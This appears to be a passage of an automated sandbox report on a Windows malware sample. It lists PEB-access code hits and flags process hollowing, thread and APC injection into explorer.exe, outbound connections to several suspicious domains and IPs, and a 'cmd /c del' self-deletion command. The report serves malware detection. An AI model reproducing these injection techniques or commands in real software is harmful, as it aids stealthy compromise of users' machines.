          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.boogerstv.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.161 80
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.107.55.6 80
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.239.73 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.220.199.8 80
          Source: C:\Windows\explorer.exeDomain query: www.totally-seo.com
          Source: C:\Windows\explorer.exeDomain query: www.dreamcashbuyers.com
          Source: C:\Windows\explorer.exeDomain query: www.swayam-moj.com
          Source: C:\Windows\explorer.exeNetwork Connect: 147.255.162.204 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeDomain query: www.hfjxhs.com
          Source: C:\Windows\explorer.exeDomain query: www.cmannouncements.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.69.66.227 80
          Source: C:\Windows\explorer.exeDomain query: www.leonardocarrillo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.195.117.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          Source: C:\Windows\explorer.exeDomain query: www.balloon-artists.com
          Source: C:\Windows\explorer.exeDomain query: www.adultpeace.com
          Source: C:\Windows\explorer.exeDomain query: www.defenestration.world
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeMemory written: C:\Users\user\Desktop\lTAPQJikGw.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: E00000
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: explorer.exe, 00000003.00000000.687115510.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Program Manager
